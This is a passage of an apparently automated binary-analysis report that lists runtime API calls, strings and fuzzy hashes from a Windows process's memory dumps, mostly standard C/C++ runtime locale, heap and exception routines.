                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                      • API String ID: 2742660187-2031265017
                                                                                                                                                                      • Opcode ID: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction ID: c3a0ce1b21258d22683cfa85828ca1b0cd9568fa2b575fd3f4ded0fc170122d3
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction Fuzzy Hash: 4EE04F51E08906D1FB04C7D3AC051B01611AFB8370E484331FA3C863D1AE6CA9D58384
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 73155330-0
                                                                                                                                                                      • Opcode ID: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction ID: a835e210e6713d9cec6ece6aca957131138b7457da0233708f5aa9ab4dc1e6a6
                                                                                                                                                                      • Opcode Fuzzy Hash: f19c406f68e5b55e61e82716ca93a81777c36e173ab4f025d0dcb92144516b81
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A41F362B15B8985EE14DF27D1042BD6B51ABA4BE0F545531EBBD8BBD1EE3CE060C380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      • Opcode ID: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction ID: 7ec8ff6c73f0f08f58d33c3b99c5501f03fab2fd3be18dee2f51808392bcd998
                                                                                                                                                                      • Opcode Fuzzy Hash: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction Fuzzy Hash: DC31A621D18A5182D768CB9695501786A95FBF5BA0B740335EB7E873E0EF3CE451D303
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1173176844-0
                                                                                                                                                                      • Opcode ID: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction ID: b9990d50ceeb27adea926d71c9937fc581f9095679d6d7a07b89bc3958226219
                                                                                                                                                                      • Opcode Fuzzy Hash: 70ba62f8a97dc7050fa898f7d0c2f8790c8e7e4e5b6d22f14cc08e110f66fe0c
                                                                                                                                                                      • Instruction Fuzzy Hash: 62E0E250F0B10745FF68B2A314261B409448FF93B0E287B30FB7F842C7BD1CA8AA8210
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3947729631-0
                                                                                                                                                                      • Opcode ID: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction ID: 0f1c1d4c4027260a23a65e2d6ce06b4e96adfd24ff9866e81a73e06bc9456b29
                                                                                                                                                                      • Opcode Fuzzy Hash: e425f939b461e09f0642d912a4c298c6d0487223980a7e59e57d9a8a5d610ba6
                                                                                                                                                                      • Instruction Fuzzy Hash: EE214F32E04B0189FB11DFA5C4442AD3AA4EBA4748F54463AEA2D82AC5FF3CD585DB84
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction ID: 622c19c802c9c3a3590748685389bb10a7e07da53bf4b64eeb51a99fc04a8cdd
                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7425f769f0ef5d05a00a5751305ae3355cb41b9d71f6080b861222f13c97f2
                                                                                                                                                                      • Instruction Fuzzy Hash: 3A114632D1868282E310DB96A450829ABA9FFF8740F550435FA7E877D6EE2CE850C744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction ID: 9b0ad6095c51baa4faf6edc14a5a9e0d18c8bacae8402792bbc809a051337788
                                                                                                                                                                      • Opcode Fuzzy Hash: 01e56fbe2c04021743b4b0bec21fb57d2ee28b38409af7f033e8060478c12aef
                                                                                                                                                                      • Instruction Fuzzy Hash: D511D632E14B569DEB10DFA0E4812EC3BB8FB68358F51063AEA5D52B99EF38C155C350
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6FE11AC55,?,?,8000000000000000,00007FF6FE116A2D,?,?,?,?,00007FF6FE11AE29), ref: 00007FF6FE11ADE1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction ID: f6a5cab6909824083af526b3b128affdd3b1f4a80d4a63bb2ef225ce23a41f22
                                                                                                                                                                      • Opcode Fuzzy Hash: fe3263e8e25c2df92887862d28651b12063e121c712c013a3fb717dcdb45fcec
                                                                                                                                                                      • Instruction Fuzzy Hash: B9F04954F49A1241FF64D6E3A8503B91E985FF9B81F0C5632E92EC67C2FE2CA8C58211
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                                      • Opcode ID: 98cfb659ee49064f92ea23b4e398555ef07566d909c29a49e897d9c8b33d77a1
                                                                                                                                                                      • Instruction ID: 962eb41aee61a2c789f170a0915d232b275f7850d1a844181c579e5d8100f6ba
                                                                                                                                                                      • Opcode Fuzzy Hash: 98cfb659ee49064f92ea23b4e398555ef07566d909c29a49e897d9c8b33d77a1
                                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0D415E5E24645FB65E6E368412795E885FF47A0F084732F93EC62C2FE2CA4818210
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DecodePointer
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3527080286-0
                                                                                                                                                                      • Opcode ID: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction ID: 9c8e7570a6ee28c2244c9bd16545826ec4c6882d7d26cec886dce7268e48c195
                                                                                                                                                                      • Opcode Fuzzy Hash: 341e8ee344b5f2fdde741966d8bcbf607ed47ed757ea4cefe913e01fcc8f9455
                                                                                                                                                                      • Instruction Fuzzy Hash: 95E0BF25E09A0281EB65DB07AC841382A61BFFA745B500432E52E823E0FE2EA0958306
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF6FE11AA7C: GetLastError.KERNEL32(?,?,?,00007FF6FE10FD01,?,?,7FFFFFFFFFFFFFFF,00007FF6FE101C2A), ref: 00007FF6FE11AA8B
                                                                                                                                                                        • Part of subcall function 00007FF6FE11AA7C: SetLastError.KERNEL32(?,?,?,00007FF6FE10FD01,?,?,7FFFFFFFFFFFFFFF,00007FF6FE101C2A), ref: 00007FF6FE11AB29
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF6FE121AFD
                                                                                                                                                                      • TranslateName.LIBCMT ref: 00007FF6FE121B38
                                                                                                                                                                      • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF6FE11386C), ref: 00007FF6FE121B7D
                                                                                                                                                                      • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF6FE11386C), ref: 00007FF6FE121BA5
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                      • String ID: utf8
                                                                                                                                                                      • API String ID: 2136749100-905460609
                                                                                                                                                                      • Opcode ID: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction ID: 847c086595658c93daebee0db52b23c511b551316eeb7a56d0edaedd40b19664
                                                                                                                                                                      • Opcode Fuzzy Hash: 908a6b83db4800547fb9010b45ec8f8f957cca1a06787f528ca73239330b9321
                                                                                                                                                                      • Instruction Fuzzy Hash: 6A915B36F0864286FB24DB62D8412B92AA5BBF6B80F444132EA6DC76D5FF3DE551C301
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3939093798-0
                                                                                                                                                                      • Opcode ID: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction ID: 136b88fa2044239390989b23f322ae9b7126c87fba2ad5f6208babb667f2ae1f
                                                                                                                                                                      • Opcode Fuzzy Hash: f790281d0b45084633252d64efd2133bc657d527af11988ede220f6fc86663f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 50715A62F086128AFB15DF62D8506BD2AA0AFFA744F448136EE2D836D5FF3CA445C351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3140674995-0
                                                                                                                                                                      • Opcode ID: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction ID: e8db67987cd6305001603216f1d12fdbd3ee81f7adb85f092dabbfe4f084cf5b
                                                                                                                                                                      • Opcode Fuzzy Hash: dd01e66c30db8e9f87cd60ad336a0cb77522f9690efad85c2707880cc22c2aab
                                                                                                                                                                      • Instruction Fuzzy Hash: 3F316176A08B8189EB60DF61E8407ED3760FB94744F444439EB5E876D8EF38D558C714
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1239891234-0
                                                                                                                                                                      • Opcode ID: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction ID: 766eaafb330312b1caba85d5aca752094618844a719b7da74d56adb4aad54156
                                                                                                                                                                      • Opcode Fuzzy Hash: e738eda3dbc1fab1b558436e85e0f414863e30d97480f66e19cff1ca9febbf30
                                                                                                                                                                      • Instruction Fuzzy Hash: F8315F36A08B8186D760CF26E8407AE77A0FBD9758F500135EBAD87B99EF38D155CB40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1443284424-0
                                                                                                                                                                      • Opcode ID: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction ID: 6b2ad15e38693717c1d6f172c68bb4a4d05f488fd82f66dfd9fcdfd134700495
                                                                                                                                                                      • Opcode Fuzzy Hash: a3ee30757392479f5a7cce126f2a8e91cadbc6b924d7436d729ce31afda1fd9e
                                                                                                                                                                      • Instruction Fuzzy Hash: BFE1F262F086819AE700CB66D8401ED7BB1FBA6788F504135EF6E97BD9EE38D516C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                                                                      • String ID: %
                                                                                                                                                                      • API String ID: 3668304517-2567322570
                                                                                                                                                                      • Opcode ID: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction ID: 8fedf5a2a1bc67f76d39220c051f3914a0acc5ceb26ee22442bc616c5c523719
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a66d5076b83e9d492563f899b77351946d8774d763da9b8404ba780dddf6097
                                                                                                                                                                      • Instruction Fuzzy Hash: 7C123222F08A8589FB25CB66E4503FD6B61ABA4788F045131EF6D97BC9EF3CD4648340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: InfoLocaletry_get_function
                                                                                                                                                                      • String ID: GetLocaleInfoEx
                                                                                                                                                                      • API String ID: 2200034068-2904428671
                                                                                                                                                                      • Opcode ID: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction ID: 165f4113c64bd5abcb08f5b8eec2e635033b5cc1c2e0e1465f193262c3c2d46c
                                                                                                                                                                      • Opcode Fuzzy Hash: eee715fbac3006e22b13ca4ea214737d10d3c8228fae26dd80626aacc3aa4420
                                                                                                                                                                      • Instruction Fuzzy Hash: 17016D25F08B8285EB00DB93B8404AAAA64AFF5BD0F584435FE6C97BD5EE3CE5418744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F2B7
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F2D6
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: GetProcAddress.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EB80
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F2F5
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: LoadLibraryW.KERNELBASE(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EACB
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: GetLastError.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EAD9
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: LoadLibraryExW.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EB1B
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F314
                                                                                                                                                                        • Part of subcall function 00007FF6FE11EA28: FreeLibrary.KERNEL32(?,?,00000005,00007FF6FE11EF06,?,?,8000000000000000,00007FF6FE11AC42,?,?,8000000000000000,00007FF6FE116A2D), ref: 00007FF6FE11EB54
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F333
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F352
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F371
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F390
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F3AF
                                                                                                                                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF6FE11F3CE
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function$Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                      • String ID: AreFileApisANSI$CompareStringEx$EnumSystemLocalesEx$GetDateFormatEx$GetLocaleInfoEx$GetTimeFormatEx$GetUserDefaultLocaleName$IsValidLocaleName$LCIDToLocaleName$LCMapStringEx$LocaleNameToLCID
                                                                                                                                                                      • API String ID: 3255926029-3252031757
                                                                                                                                                                      • Opcode ID: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction ID: dd6d0c1c972d945994cc0a08de531c001d4777fa5c668343478663b0e91d4384
                                                                                                                                                                      • Opcode Fuzzy Hash: 7ae8db01b808dd89840a75df8cabf87d40bbb11ba067a80d5ff1f2e4a99f70d4
                                                                                                                                                                      • Instruction Fuzzy Hash: 26316B60D18A47A8F704DB96EC526E96B21BBA4341FC04437F43D961E2BF7CA64DC349
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                      • API String ID: 459529453-1866435925
                                                                                                                                                                      • Opcode ID: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction ID: 9397e355f3e7feb57b5efef3bdc211434a023596e2cdd9601f290eb4a6a92c3a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5f5df7f7e40a59f312fc8a143b46a986f631a95f737e9221bd87bb5ff3ae644f
                                                                                                                                                                      • Instruction Fuzzy Hash: 53B19E22E09A8185EB24DB16E4403B97BA1FBD5B84F545136EBAD83BE5EF3CD455C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000012.00000002.287371290.00007FF6FE101000.00000020.00020000.sdmp, Offset: 00007FF6FE100000, based on PE: true
                                                                                                                                                                      • Associated: 00000012.00000002.287354288.00007FF6FE100000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287431426.00007FF6FE12C000.00000002.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287492135.00007FF6FE140000.00000004.00020000.sdmp
                                                                                                                                                                      • Associated: 00000012.00000002.287505190.00007FF6FE144000.00000002.00020000.sdmp
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::cancel_current_taskstd::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                                                                                                                      • String ID: bad locale name$false$true
                                                                                                                                                                      • API String ID: 4121308752-1062449267
                                                                                                                                                                      • Opcode ID: 1883a582b6bff787cff5b330a0cd1b3edb92caeee22c469266d388372aeb76fc
                                                                                                                                                                      • Instruction ID: fbb9438d87b5794cce2664a2a25a1ea1f0f1e435c6ecff4114545a37677b0407
                                                                                                                                                                      • Opcode Fuzzy Hash: 1883a582b6bff787cff5b330a0cd1b3edb92caeee22c469266d388372aeb76fc
